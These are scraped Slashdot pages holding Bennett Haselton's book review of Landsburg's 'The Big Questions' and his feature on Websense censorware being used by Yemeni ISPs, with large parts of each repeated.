    "What caused your decision to get drunk and watch Mystery Science Theater the night before your philosophy final? Free will. An insane person might object that free will can't be it at all, because free will is just a shorthand term for an indescribably complex process involving trillions of neurons, which in turn can be described in terms of quadrillions of atoms and quintillions of subatomic particles. So what? You still have free will, and you know it."

    I wrote Landsburg to object that this misses what people really mean by "free will" -- it's not just a shorthand term for the aggregate of particle interactions that make up human choices. It means, very specifically, that you could possibly have done something other than what you did. Landsburg replied to this objection by e-mail: "I dispute that there is any way to make sense of a phrase like 'could possibly have done something else'. I know what it means to say you did something; spacetime consists of all the things that get done; it is what it is." And I agree; it's hard to pin down what the statement means. But it underlies all of our instincts and intuition about human choices and blame: "You could have called yesterday, but you didn't." "I should have studied harder last night." If determinism is true, then these statements make no sense, and therein lies what I think most people mean then they refer to the paradox of determinism vs. free will. I think the issue deserves more thought than it's given in the book.

    This is followed by a passage arguing that the controversy over "ESP" is silly, because of course everyone knows certain things by "extra-sensory perception", if by that you mean "things perceived not through the senses" -- like mathematical truths, which are arrived at through thought and not sensory input. Writes Landsburg: "Some of those phenomena have one additional characteristic: They are physically impossible. But if you're going to define ESP by its impossibility, then of course there's no point in debating it... And if impossibility is not a criterion, then mathematical insight is as good an example of ESP -- in the everyday sense of the term -- as any instance of clairvoyance or telepathy." Actually, I think the everyday use of the word "ESP" refers to perceiving facts that do not logically have to be true (so mathematical facts are excluded) -- like "Someone is watching me right now" -- without sensory input. And, once you clarify the definition, most people agree there's no evidence for it, so the whole discussion seems uninteresting.

    But even if you throw out 75% of the book's arguments (which is far more than I rejected), you should still enjoy puzzling through the remaining 25% and forming your own conclusions. The most interesting argument in the book, to me, is about how to properly answer the question: How much should the government be willing to spend, to save the life of one of it's citizens? Of course if you're Ayn Rand, the answer is zero, but if you want to answer the question according to the laws of economic efficiency, it's a tough one. Landsburg originally got into the debate by writing a column arguing that ventilator support was not the most efficient way to help the poor. (Unfortunately, he couched it in the language of "ventilator insurance", which I think clouded the issue. I think it would have been more clear to say: "If we're going to spend this money to help the poor at all, it would make more sense to spend it on groceries for a far larger number of people, than to spend it on ventilator support for one person.") Another more liberal economist, Robert Frank, responded with a New York Times editorial arguing with Landsburg's methods and coming up with his own reasoning. I think there are problems with the reasoning on both sides (not logical errors, but rather situations in which the rules that they have adopted, lead to paradoxes and untenable positions -- suggesting that both sides' axioms have to be thrown out), but I still don't know the answer. (My own opinion about the flaws in their logic, and an alternative answer, is at this link: "How much should government spend to save a single life?")

    The Big Questions also has excursions into areas of science and mathematics that I had never fully understood before, and in some cases hadn't even thought about. Landsburg describes how he had first learned that colors could be arranged continuously into a color wheel, and later learned that they could be arranged continuously along a line according to their wavelengths, and then a friend pointed out the contradiction. Which is it? Do colors vary continuously in two dimensions (forming a wheel) or one (forming a line)? Or, wait a minute, we measure colors according to the strength of their red, green, and blue components, so don't they vary continuously in three dimensions? Well, the answer is in there.

    There are also chapters on Heisenberg's uncertainty principle, Gödel's incompleteness theorem, and the quantum phenomenon of "spooky action at a distance", which explain all of the concepts more clearly than I'd ever heard them explained anywhere else. I think that most writers attempting to explain these concepts err either on the side of being too precise -- determined that everything they right be correct, with no regard for whether they reader grasps it or not -- or too vague -- giving the general air of mystery, but not explaining the rules governing how a phenomenon works, and how to work with those rules to derive other conclusions from them. Landsburg's chapter simply begins, "This chapter is full of lies. That's because I'll be explaining the foundations of quantum mechanics, and I assume that if you wanted a careful accounting of every detail, you'd be reading a textbook." The text then gives an example of considering an electron that moves in a conceptual "circle", where at some points on the circle it has a greater probability of manifesting itself in one location if you examine it, and at other points it has a greater probability of manifesting itself in another location. He uses this to dispel a common misconception about the uncertainty principle:

    You're just idly wondering where the electron is. In most circumstances, quantum mechanics says that it's quite impossible for you to know the answer to that question.

    Aha! A fundamental limitation on human knowledge, no? No. Here's why: Most of the time, the electron is nowhere. Asking "Where is the electron?" is akin to asking "What is the electron's favorite movie?". It's a nonsense question. The inability to answer nonsense questions is not a fundamental limitation on knowledge.

    How can the electron be nowhere? Because electrons behave nothing at all like anything you're familiar with. Instead of a location, the electron has a quantum state.

    This clarified something for me that had bugged me for years. I never took a course in quantum physics, but I had indeed always assumed that electrons did have a "location" and the uncertainty principle referred to a limit on our ability to determine that location. Unfortunately there are probably many people who get through an entire course in quantum physics without getting this cleared up.

    Balanced against these valuable insights are some libertarian arguments that are probably nothing you haven't heard before, especially if you have read of one of Landsburg's earlier books, Fair Play -- subtitled "What your child can teach you about economics, values, and the meaning of life", although the book was clearly about what he was teaching to his daughter. Many reviewers of Fair Play took note of passages like this one:

    Most people have instinctive sympathy for the man who says "I tried for months to get a job and nobody would hire me. Only in desperation did I turn to theft." The same people have only scorn for the man who says "I tried for months to get a date and nobody would go out with me. Only in desperation did I turn to rape."

    While I think most rape victims would have some choice words about the comparison, I was more unpersuaded because the passage wasn't structured like a true argument. In a good argument -- like Landsburg's earlier argument against protectionist tariffs -- -- you start with premises that seem apparently true, proceed by steps that seem apparently valid, and end with a conclusion that may not have been obvious from the outset. But in this case, the premise is the argument -- either you think rape and theft are comparable, or you don't. I don't think they are, because (a) the harm to a rape victim is out of proportion to the "benefit" to the rapist, and (b) notwithstanding the claims of college males, you won't actually die without sex. (Just as a thought experiment, if you would die without sex, and a man hadn't been able to get any women to sleep with him, and the government didn't provide any sort of sex "safety net", more people probably would feel sympathy for the rapist, if he only did it to save his own life.)

    Some passages in The Big Questions are recycled from Fair Play and require a (just) slightly more thoughtful rebuttal. Landsburg argues that most parents, deep down, must not believe in redistributive taxation because

    "I have never, ever, heard a parent say to a child that it's okay to forcibly take toys away from other children who have more toys than you do. Nor have I ever heard a parent tell a child that if one kid has more toys than the others, then it's okay for those others to form a 'government' and vote to take those toys away."

    OK, but... I have also never heard a parent tell their child that it was OK to build a "jail" and put other kids in that "jail" for wrongdoing. And yet almost everyone, even libertarians, supports some form of imprisonment for lawbreakers. The lesson here is that there are some powers that are appropriate to delegate to a democratically elected government, with all the right checks and balances, but that you don't want random vigilantes seizing for themselves. So if you want a principled argument against taxation, it would take more than that.

    And other passages in Fair Play deservedly did not make the cut of being imported into The Big Questions:

    The massacre at Waco took place only days after my daughter (then aged six) had asked me how the government uses our tax dollars. When she walked in on the television coverage of flamed and carnage, I told her that now she was seeing the answer to her question. And when she heard that there were children in there, that they were burning children, her eyes grew wide with horror, and I both hope and believe that she will never forget that moment.

    If you want 230 pages of that, then Fair Play is the book for you!

    Of the libertarian arguments that did get carried over into The Big Questions, I think the problem with most of them is not that I think the conclusion is wrong, but, again, that the whole argument is the premise, and if you disagree with the premise then there's nothing to think about. For example:

    Bert wants to hire an office manager and Ernie wants to manage an office. The law allows Ernie to refuse any job for any reason. If he doesn't like Albanians, he doesn't have to work for one. Bert is held to a higher standard: If he lets it be known that no Albanians need apply, he'd better have a damned good lawyer.

    These asymmetries grate against the most fundamental requirement of fairness -- that people should be treated equally, in the sense that their rights and responsibilities should not change because of irrelevant external circumstances.

    But I think the laws do treat all people equally, because they apply equally whether Bert is discriminating in deciding whether to hire Ernie, or whether Ernie is discriminating in deciding whether to hire Bert. The laws don't apply equally to all roles that people play, which is the distinction that Landsburg is highlighting -- but laws never apply equally to different roles, since roles are defined by what we do, and what is the point of laws, except to draw distinctions based on behaviors? So there may be some other argument against anti-discrimination laws, but "symmetry" by itself wouldn't be enough.

    A footnote in this chapter of The Big Questions says, "Portions of this chapter are adapted from my earlier book Fair Play." In the margin where I'd been scribbling all of my notes and equations and counterarguments, I wrote, "That's what's wrong with it!"

    And yet, as I said, I would probably have paid up to about $200 for the book, based on how much I enjoyed the parts that I did like. At one point Landsburg praises an insight from Daniel Dennett and Douglas Hofstadter and adds, "You should read all their books." Yes, and all of Richard Dawkins's and Malcolm Gladwell's and Steven Pinker's and Dubner's and Levitt's books, for starters. Landsburg himself would probably agree that it's more important to read those books, than this one. But there's time in your life to read The Big Questions as well. It's even structured so you can consume it in bite-sized portions while taking a break from working your way through those other books -- which are, in truth, more valuable, but not as much fun.

    You can purchase The Big Questions: Tackling the Problems of Philosophy with Ideas from Mathematics, Economics and Physics from amazon.com. Slashdot welcomes readers' book reviews -- to see your own review here, read the book review guidelines, then visit the submission page.

  22. The Big Questions

    News · · posted by samzenpus · from the read-all-about-it dept. · 229 comments
    Frequent Slashdot contributor Bennett Haselton changes things up today by reviewing The Big Questions: Tackling the Problems of Philosophy with Ideas from Mathematics, Economics and Physics. Questions that big need a big review and you can learn what Bennett has to say about it all by reading below. The Big Questions: Tackling the Problems of Philosophy with Ideas from Mathematics, Economics and Physics author Steven E. Landsburg pages 288 pages publisher Free Press rating 8/10 reviewer Bennett Haselton ISBN 978-1439148211 summary Steven Landsburg uses concepts from mathematics, economics, and physics to address the big questions in philosophy The first thing that I have to admit as a reviewer is that I enjoyed the book -- not just reading it, but scribbling out pages of scratch paper working on the puzzles inspired by the book -- that I probably would have paid up to about $200 for it (despite the fact that I disagreed with many of the conclusions, and even thought some of the arguments were pretty weak). I certainly don't mean that it's better than books by Richard Dawkins, Daniel Dennett, Steven Pinker, Malcolm Gladwell, or Steven Levitt and Steven Dubner (the Freakonomics and SuperFreakonomics team), but it will appeal to many of the same people.

    Those authors' books typically marshall a large amount of research data and evidence in support of a thesis that seems contrarian but turns out to be probably true. The Big Questions (released November 3rd with a companion website and blog doesn't do that. The book is divided into many self-contained vignettes and side topics and independent arguments, which are based more on logic and reasoning than externally gathered evidence, and the arguments don't always convince you of the conclusions. But that's part of the fun: many of the arguments in the book are structured so rigorously, almost like mathematical proofs, that if you disagree the conclusion, the challenge is to figure out why you think the conclusion is wrong. (Nobody ever scribbled equations in the margins of Malcolm Gladwell's books trying to figure out if he was "right".)

    You'll probably enjoy the book the most if the following are true for you:
    • You enjoyed math all the way through high school, especially the paradoxes that seemed to grow out of elementary rules of logic or probability. Sometimes the paradoxes resulted from a flaw in one of the reasoning steps, so that identifying the flaw led to a deeper understanding of how to conduct those steps. And sometimes there really is no flaw in the reasoning, so that the conclusion, no matter how counterintuitive, must be true.
    • Eventually, though, you ran out of "paradoxes" that could be described in the language of intermediate mathematics. There are other paradoxes lurking in mathematics, of course (like the celebrated Banach-Tarski paradox), but most of them require you to learn so much mathematics just to understand the paradox, that there aren't enough hours in the day.
    • So, you'd be delighted to discover paradoxes in an entirely new field, where arguments built from elementary rules of logic, lead to a conclusion that seems at first to make no sense, but leads to a deeper understanding the more you think about it.

    The core philosophy of The Big Questions -- not embodying any of the conclusions, but rather the rules of the game by which those conclusions should be reached -- is expressed in two lines near the end:

    If you're objecting to a logical argument, try asking yourself exactly which line in that argument you're objecting to. If you can't identify the locus of your disagreement, you're probably just blathering.

    (This quote makes Landsburg sound grumpier than he is; at this point in the book, he's just coming off of describing an exhausting round of e-mail argument with another professor who he felt was not playing by these rules.) I've believed this passionately for a long time, and to me it seems trivially true anyway: If an argument is organized into a series of steps, and you disagree with the conclusion, then some step in the argument must be the first step you disagree with, and if the author feels like each step in their argument follows by airtight logic from the previous step, then that's the point at which one of the two players is wrong. There's nothing more exasperating to me than writing what I think is a well-reasoned logical argument, sending it to the intended audience, and getting back a reply which makes it obvious that the recipient simply read my conclusion, disagreed with it, cleared their throat, and started typing out paragraphs describing their own view. Which they're entitled to, but they missed the point -- I was hoping that if they disagreed with my argument, they could pinpoint exactly what part they disagreed with. (If they had replied with their own argument structured like a sequence of logical steps, then that would at least be a tit-for-tat exchange, but that rarely happens -- people who believe in forming their arguments like rigorous proofs, usually also like to find the error in logical arguments that lead to the opposite conclusion.)

    To give you some of the flavor: One chapter in The Big Questions contains an elegant argument against protectionist tariffs: Suppose that an American sells cameras for $80 but a foreigner wants to sell cameras in America for $60 apiece. An American who would have bought the $80 camera will now buy the $60 camera and hence is better off by $20. The seller now has to sell their own cameras for $60 to stay competitive, so they are worse off by at most $20 -- however, if they voluntarily switch to some other business, then they'll be better off than they were when they were selling cameras for $60, and therefore worse off by some amount less than $20 from their original position. So on balance, abolishing protectionist tariffs would be good for Americans. "Therefore," writes Landsburg, "it seems to me that the protectionist's position is even less respectable than the creationist's. If you're convinced that most scientists are liars -- that everything they say about fossils, for example, is false -- then you can be a logically consistent creationist. But you can't be a logically consistent protectionist."

    But the best part of reading an argument like that is to try and come up with a counter-argument that is equally rigorous. I think Landsburg is right, but only insofar as it applies to benefits to Americans. That leaves out another part of the equation: whether the production of cheaper foreign goods is harmful to foreigners providing the cheap labor. The textbook answer from economic theory is that the factory jobs must make workers better off (or at least no worse off) than they were before, otherwise they wouldn't have taken the jobs voluntarily. On the other hand, conditions in overseas sweatshops are so notoriously dangerous and unpleasant that it seems hard to believe the opportunities leave workers better off on balance. So you could be a logically consistent protectionist if you believe that: (a) sweatshop workers systematically underestimate how much the factory jobs are harming them; and (b) the harm done to the workers outweighs the benefits of lower prices for Americans. I'm not sure if these statements are true, but they are logically consistent. Still, Landsburg's argument is about as concise as possible and seems to refute any argument that protectionism makes
    Americans better off on average.

    In another chapter, Landsburg discusses the recent atheist bestsellers such as Richard Dawkins's The God Delusion and suggests that these books are really directed against a non-existent enemy, because the evidence is quite strong that most adults do not really believe the tenets of any major religion anyway. There is the argument that "interfaith dialog" makes no sense if you really believe (as many major religions teach) that your own religion's tenets are settled beyond discussion. There is the argument that since economic theory consistently shows that people respond to threat of punishment, virtually no one behaves as if they actually believe in everlasting damnation after death as punishment for sin. And the fact that the voluntary martyrdom of suicide bombers is vastly more rare than most people believe, and a disproportionate number of those are children (as Landsburg says, "I do not deny that many children believe in God, just as I do not deny that many children believe in Santa Claus"). I'd wondered before about how many people really did believe in God, but in just a few pages this argument had me thinking that the number was a lot lower than I'd ever thought before.

    On the other hand, there were some arguments that I didn't spend much time puzzling over at all. Landsburg summarizes the paradox of "free will", and his dismissal of the paradox, basically as follows: The interactions of atoms that make up our brains and our environments, are deterministic processes, so if you know the state of a system at a given point in time, you could predict the state at any future point in time if you had enough computational power (with a caveat about the randomness possibly introduced by quantum physics). "Where, then, is there room for free will?... Easy: There is room for free will on Tuesday, Wednesday, Thursday and Friday, as the human being in question engages in deliberations that ultimately cause his actions." He says that just as "weather" is shorthand for the aggregate of the interactions of trillions of water molecules, "free will" is the same kind of shorthand:

    "What caused your decision to get drunk and watch Mystery Science Theater the night before your philosophy final? Free will. An insane person might object that free will can't be it at all, because free will is just a shorthand term for an indescribably complex process involving trillions of neurons, which in turn can be described in terms of quadrillions of atoms and quintillions of subatomic particles. So what? You still have free will, and you know it."

    I wrote Landsburg to object that this misses what people really mean by "free will" -- it's not just a shorthand term for the aggregate of particle interactions that make up human choices. It means, very specifically, that you could possibly have done something other than what you did. Landsburg replied to this objection by e-mail: "I dispute that there is any way to make sense of a phrase like 'could possibly have done something else'. I know what it means to say you did something; spacetime consists of all the things that get done; it is what it is." And I agree; it's hard to pin down what the statement means. But it underlies all of our instincts and intuition about human choices and blame: "You could have called yesterday, but you didn't." "I should have studied harder last night." If determinism is true, then these statements make no sense, and therein lies what I think most people mean then they refer to the paradox of determinism vs. free will. I think the issue deserves more thought than it's given in the book.

    This is followed by a passage arguing that the controversy over "ESP" is silly, because of course everyone knows certain things by "extra-sensory perception", if by that you mean "things perceived not through the senses" -- like mathematical truths, which are arrived at through thought and not sensory input. Writes Landsburg: "Some of those phenomena have one additional characteristic: They are physically impossible. But if you're going to define ESP by its impossibility, then of course there's no point in debating it... And if impossibility is not a criterion, then mathematical insight is as good an example of ESP -- in the everyday sense of the term -- as any instance of clairvoyance or telepathy." Actually, I think the everyday use of the word "ESP" refers to perceiving facts that do not logically have to be true (so mathematical facts are excluded) -- like "Someone is watching me right now" -- without sensory input. And, once you clarify the definition, most people agree there's no evidence for it, so the whole discussion seems uninteresting.

    But even if you throw out 75% of the book's arguments (which is far more than I rejected), you should still enjoy puzzling through the remaining 25% and forming your own conclusions. The most interesting argument in the book, to me, is about how to properly answer the question: How much should the government be willing to spend, to save the life of one of it's citizens? Of course if you're Ayn Rand, the answer is zero, but if you want to answer the question according to the laws of economic efficiency, it's a tough one. Landsburg originally got into the debate by writing a column arguing that ventilator support was not the most efficient way to help the poor. (Unfortunately, he couched it in the language of "ventilator insurance", which I think clouded the issue. I think it would have been more clear to say: "If we're going to spend this money to help the poor at all, it would make more sense to spend it on groceries for a far larger number of people, than to spend it on ventilator support for one person.") Another more liberal economist, Robert Frank, responded with a New York Times editorial arguing with Landsburg's methods and coming up with his own reasoning. I think there are problems with the reasoning on both sides (not logical errors, but rather situations in which the rules that they have adopted, lead to paradoxes and untenable positions -- suggesting that both sides' axioms have to be thrown out), but I still don't know the answer. (My own opinion about the flaws in their logic, and an alternative answer, is at this link: "How much should government spend to save a single life?")

    The Big Questions also has excursions into areas of science and mathematics that I had never fully understood before, and in some cases hadn't even thought about. Landsburg describes how he had first learned that colors could be arranged continuously into a color wheel, and later learned that they could be arranged continuously along a line according to their wavelengths, and then a friend pointed out the contradiction. Which is it? Do colors vary continuously in two dimensions (forming a wheel) or one (forming a line)? Or, wait a minute, we measure colors according to the strength of their red, green, and blue components, so don't they vary continuously in three dimensions? Well, the answer is in there.

    There are also chapters on Heisenberg's uncertainty principle, Gödel's incompleteness theorem, and the quantum phenomenon of "spooky action at a distance", which explain all of the concepts more clearly than I'd ever heard them explained anywhere else. I think that most writers attempting to explain these concepts err either on the side of being too precise -- determined that everything they right be correct, with no regard for whether they reader grasps it or not -- or too vague -- giving the general air of mystery, but not explaining the rules governing how a phenomenon works, and how to work with those rules to derive other conclusions from them. Landsburg's chapter simply begins, "This chapter is full of lies. That's because I'll be explaining the foundations of quantum mechanics, and I assume that if you wanted a careful accounting of every detail, you'd be reading a textbook." The text then gives an example of considering an electron that moves in a conceptual "circle", where at some points on the circle it has a greater probability of manifesting itself in one location if you examine it, and at other points it has a greater probability of manifesting itself in another location. He uses this to dispel a common misconception about the uncertainty principle:

    You're just idly wondering where the electron is. In most circumstances, quantum mechanics says that it's quite impossible for you to know the answer to that question.

    Aha! A fundamental limitation on human knowledge, no? No. Here's why: Most of the time, the electron is nowhere. Asking "Where is the electron?" is akin to asking "What is the electron's favorite movie?". It's a nonsense question. The inability to answer nonsense questions is not a fundamental limitation on knowledge.

    How can the electron be nowhere? Because electrons behave nothing at all like anything you're familiar with. Instead of a location, the electron has a quantum state.

    This clarified something for me that had bugged me for years. I never took a course in quantum physics, but I had indeed always assumed that electrons did have a "location" and the uncertainty principle referred to a limit on our ability to determine that location. Unfortunately there are probably many people who get through an entire course in quantum physics without getting this cleared up.

    Balanced against these valuable insights are some libertarian arguments that are probably nothing you haven't heard before, especially if you have read of one of Landsburg's earlier books, Fair Play -- subtitled "What your child can teach you about economics, values, and the meaning of life", although the book was clearly about what he was teaching to his daughter. Many reviewers of Fair Play took note of passages like this one:

    Most people have instinctive sympathy for the man who says "I tried for months to get a job and nobody would hire me. Only in desperation did I turn to theft." The same people have only scorn for the man who says "I tried for months to get a date and nobody would go out with me. Only in desperation did I turn to rape."

    While I think most rape victims would have some choice words about the comparison, I was more unpersuaded because the passage wasn't structured like a true argument. In a good argument -- like Landsburg's earlier argument against protectionist tariffs -- -- you start with premises that seem apparently true, proceed by steps that seem apparently valid, and end with a conclusion that may not have been obvious from the outset. But in this case, the premise is the argument -- either you think rape and theft are comparable, or you don't. I don't think they are, because (a) the harm to a rape victim is out of proportion to the "benefit" to the rapist, and (b) notwithstanding the claims of college males, you won't actually die without sex. (Just as a thought experiment, if you would die without sex, and a man hadn't been able to get any women to sleep with him, and the government didn't provide any sort of sex "safety net", more people probably would feel sympathy for the rapist, if he only did it to save his own life.)

    Some passages in The Big Questions are recycled from Fair Play and require a (just) slightly more thoughtful rebuttal. Landsburg argues that most parents, deep down, must not believe in redistributive taxation because

    "I have never, ever, heard a parent say to a child that it's okay to forcibly take toys away from other children who have more toys than you do. Nor have I ever heard a parent tell a child that if one kid has more toys than the others, then it's okay for those others to form a 'government' and vote to take those toys away."

    OK, but... I have also never heard a parent tell their child that it was OK to build a "jail" and put other kids in that "jail" for wrongdoing. And yet almost everyone, even libertarians, supports some form of imprisonment for lawbreakers. The lesson here is that there are some powers that are appropriate to delegate to a democratically elected government, with all the right checks and balances, but that you don't want random vigilantes seizing for themselves. So if you want a principled argument against taxation, it would take more than that.

    And other passages in Fair Play deservedly did not make the cut of being imported into The Big Questions:

    The massacre at Waco took place only days after my daughter (then aged six) had asked me how the government uses our tax dollars. When she walked in on the television coverage of flamed and carnage, I told her that now she was seeing the answer to her question. And when she heard that there were children in there, that they were burning children, her eyes grew wide with horror, and I both hope and believe that she will never forget that moment.

    If you want 230 pages of that, then Fair Play is the book for you!

    Of the libertarian arguments that did get carried over into The Big Questions, I think the problem with most of them is not that I think the conclusion is wrong, but, again, that the whole argument is the premise, and if you disagree with the premise then there's nothing to think about. For example:

    Bert wants to hire an office manager and Ernie wants to manage an office. The law allows Ernie to refuse any job for any reason. If he doesn't like Albanians, he doesn't have to work for one. Bert is held to a higher standard: If he lets it be known that no Albanians need apply, he'd better have a damned good lawyer.

    These asymmetries grate against the most fundamental requirement of fairness -- that people should be treated equally, in the sense that their rights and responsibilities should not change because of irrelevant external circumstances.

    But I think the laws do treat all people equally, because they apply equally whether Bert is discriminating in deciding whether to hire Ernie, or whether Ernie is discriminating in deciding whether to hire Bert. The laws don't apply equally to all roles that people play, which is the distinction that Landsburg is highlighting -- but laws never apply equally to different roles, since roles are defined by what we do, and what is the point of laws, except to draw distinctions based on behaviors? So there may be some other argument against anti-discrimination laws, but "symmetry" by itself wouldn't be enough.

    A footnote in this chapter of The Big Questions says, "Portions of this chapter are adapted from my earlier book Fair Play." In the margin where I'd been scribbling all of my notes and equations and counterarguments, I wrote, "That's what's wrong with it!"

    And yet, as I said, I would probably have paid up to about $200 for the book, based on how much I enjoyed the parts that I did like. At one point Landsburg praises an insight from Daniel Dennett and Douglas Hofstadter and adds, "You should read all their books." Yes, and all of Richard Dawkins's and Malcolm Gladwell's and Steven Pinker's and Dubner's and Levitt's books, for starters. Landsburg himself would probably agree that it's more important to read those books, than this one. But there's time in your life to read The Big Questions as well. It's even structured so you can consume it in bite-sized portions while taking a break from working your way through those other books -- which are, in truth, more valuable, but not as much fun.

    You can purchase The Big Questions: Tackling the Problems of Philosophy with Ideas from Mathematics, Economics and Physics from amazon.com. Slashdot welcomes readers' book reviews -- to see your own review here, read the book review guidelines, then visit the submission page.

  23. Yemenis Should Be Incensed At Websense

    Features · · posted by CmdrTaco · from the not-the-worst-of-their-problems dept. · 93 comments
    Slashdot regular Bennett Haselton writes "Websense, a US-based Internet-censoring software maker, claims not to sell to foreign governments that are censoring Internet access for all of their citizens. But the OpenNet Initiative reports that national ISPs in Yemen have been using Websense to filter Internet access for at least the past four years. Will Websense revoke their license? And what would happen then?" Update: 08/10 21:01 GMT by KD : Bennett adds, "After the story ran, Websense sent me this update." "Since we were informed about the potential use of our products by Yemeni ISPs based on government-imposed Internet restrictions in Yemen, we have investigated this potential non-compliance with our anti-censorship policy. Because our product operates based on a database system, we are able to block updated database downloads to locations and to end users where the use of our product would violate law or our corporate policies. We believe that we have identified the specific product subscriptions that are being used for Web filtering by ISPs in Yemen, and in accordance with our policy against government-imposed censorship, we have taken action to discontinue the database downloads to the Yemeni ISPs."

    The Internet censoring software maker Websense has a published policy on their website against allowing their software to be used for government-mandated censorship:

    Websense does not sell to governments or Internet Service Providers (ISPs) that are engaged in any sort of government-imposed censorship. Any government-mandated censorship projects will not be engaged by Websense. If Websense does win a business and later discovers that the government is requiring all of its national ISPs to engage in censorship of the Web and Web content, we will remove our technology and capabilities from the project.

    This supposedly differentiates the company from competitors such as Smartfilter (now owned by McAfee), which according to OpenNet Initiative reports, is used to censor the Internet in several African and Middle Eastern countries including Tunisia, Saudi Arabia, UAE, and Sudan. Websense once enthusiastically competed for the contract to censor Internet access in Saudi Arabia, but has now apparently ceded such markets to Smartfilter.

    However, according to the ONI, the two national ISPs in the country of Yemen are using Websense to censor Internet access for all users. The researchers found that some sites are blocked in Yemen that are probably not on Websense's original filtering list, such as the Yemeni Socialist Party, as well as sites that are blocked under standard Websense categories, such as pornography, sex education materials, and "anonymizing and privacy tools" (presumably, proxy sites).

    Websense declined to tell me whether they have ever revoked an ISP's license to use Websense after discovering that the ISP was using it in violation of their anti-government-censorship policy. They also declined to say whether they had any ISP customers in Middle Eastern countries, apart from Yemen. (For any Middle Eastern ISP using Websense, there's a high probability that they would be doing it as a result of a government mandated filtering policy, and hence in violation of Websense's stated rules.) But regarding the use of Websense in Yemen, Websense did reply to say simply, "We will look into the matter. If our software is being used in violation of our policy, we will take appropriate action." I think that if they were serious about preventing their software from being used for government censorship, they should have red-flagged any purchase from a national ISP in a country with one of the worst press-freedom ratings in the world, but better late than never.

    There are only about 200,000 Internet users in Yemen, compared to over six million in Saudi Arabia, millions more in other censored Middle Eastern countries, and 300 million in Internet-censored China. (And even the Yemenis' Internet access is not filtered all the time, since the ONI report says that the number of concurrent licenses for Websense purchased by the Yemeni ISPs is less than the number of Yemeni Internet users, and when the number of concurrent users exceeds the number of licenses, all requests go through unfiltered!) So it would be a small step towards global liberation of the Internet, but still equivalent to de-censoring Internet access for every resident of Boise if the city had 100% broadband penetration, which is enough to justify putting the squeeze on Websense.

    What exactly would happen if Websense did revoke their license for the Yemeni ISPs? They couldn't force the ISPs to uninstall the software, but they could stop allowing them to download further updates to the Websense blocked-site list. Most installations of Websense are configured to download updates to the list every day, to block the latest adult websites as well as to try and stay ahead of newly released proxy sites. Once the list updates stopped, all existing blocked websites would remain blocked, but newly created adult sites and proxy sites would be accessible, and the filtering would gradually become less and less effective. So it would be a concrete victory for Yemeni Internet users, and not just a symbolic gesture.

    How would we know if Websense went through with it, anyway, if they refuse to confirm or deny that they have revoked the licenses for Yemen? The ONI declined to tell me how exactly they determined that Yemeni ISPs were using Websense. (Not that I mind; they could have obtained this information with the help of people whose jobs and freedom would be at stake if they were found out, in which case ONI would not be able to share their confidential sources.) Presumably the ONI could repeat their research in the future to determine if Websense were still being used. However, even if they can see that Websense software is still being used to censor the Internet, it may not be easy to tell whether the Yemeni ISPs are still downloading updates to the blocked-site list. My suggestion: Create a new proxy site and don't publicize it anywhere, but report it to Websense for blocking. Test a few days later to verify that it's blocked by Websense, but not by Smartfilter or other popular blocking programs. Then see if it's blocked in Yemen as well. If not, then hopefully that means that Websense cut them off.

    And then what? Maybe the Yemeni ISPs will just continue using Websense with a frozen copy of the blocked site list, reasoning that most of the well-known adult sites that users are going to try to visit, are probably already on that list. Maybe they'll set up a shell company in another country, posing as an ISP requesting a legitimate copy of Websense, and buy a new list subscription that way. But it will still be worth it to press Websense into revoking their license, even if it only breaks Internet censorship in Yemen for a few months or a year. At that point, perhaps they'll just take their business to Smartfilter like almost every other Middle Eastern country that censors the Internet.

    After all, we shouldn't pick on Websense too much, when Smartfilter is censoring national Internet access for about 100 times that many users in total. If Websense says they don't provide software to government censors, then we should hold them to that. But the real scandal isn't that American censorware companies provide filters to censoring governments while claiming not to, it's that American companies are doing it at all.

  24. Yemenis Should Be Incensed At Websense

    Features · · posted by CmdrTaco · from the not-the-worst-of-their-problems dept. · 93 comments
    Slashdot regular Bennett Haselton writes "Websense, a US-based Internet-censoring software maker, claims not to sell to foreign governments that are censoring Internet access for all of their citizens. But the OpenNet Initiative reports that national ISPs in Yemen have been using Websense to filter Internet access for at least the past four years. Will Websense revoke their license? And what would happen then?" Update: 08/10 21:01 GMT by KD : Bennett adds, "After the story ran, Websense sent me this update." "Since we were informed about the potential use of our products by Yemeni ISPs based on government-imposed Internet restrictions in Yemen, we have investigated this potential non-compliance with our anti-censorship policy. Because our product operates based on a database system, we are able to block updated database downloads to locations and to end users where the use of our product would violate law or our corporate policies. We believe that we have identified the specific product subscriptions that are being used for Web filtering by ISPs in Yemen, and in accordance with our policy against government-imposed censorship, we have taken action to discontinue the database downloads to the Yemeni ISPs."

    The Internet censoring software maker Websense has a published policy on their website against allowing their software to be used for government-mandated censorship:

    Websense does not sell to governments or Internet Service Providers (ISPs) that are engaged in any sort of government-imposed censorship. Any government-mandated censorship projects will not be engaged by Websense. If Websense does win a business and later discovers that the government is requiring all of its national ISPs to engage in censorship of the Web and Web content, we will remove our technology and capabilities from the project.

    This supposedly differentiates the company from competitors such as Smartfilter (now owned by McAfee), which according to OpenNet Initiative reports, is used to censor the Internet in several African and Middle Eastern countries including Tunisia, Saudi Arabia, UAE, and Sudan. Websense once enthusiastically competed for the contract to censor Internet access in Saudi Arabia, but has now apparently ceded such markets to Smartfilter.

    However, according to the ONI, the two national ISPs in the country of Yemen are using Websense to censor Internet access for all users. The researchers found that some sites are blocked in Yemen that are probably not on Websense's original filtering list, such as the Yemeni Socialist Party, as well as sites that are blocked under standard Websense categories, such as pornography, sex education materials, and "anonymizing and privacy tools" (presumably, proxy sites).

    Websense declined to tell me whether they have ever revoked an ISP's license to use Websense after discovering that the ISP was using it in violation of their anti-government-censorship policy. They also declined to say whether they had any ISP customers in Middle Eastern countries, apart from Yemen. (For any Middle Eastern ISP using Websense, there's a high probability that they would be doing it as a result of a government mandated filtering policy, and hence in violation of Websense's stated rules.) But regarding the use of Websense in Yemen, Websense did reply to say simply, "We will look into the matter. If our software is being used in violation of our policy, we will take appropriate action." I think that if they were serious about preventing their software from being used for government censorship, they should have red-flagged any purchase from a national ISP in a country with one of the worst press-freedom ratings in the world, but better late than never.

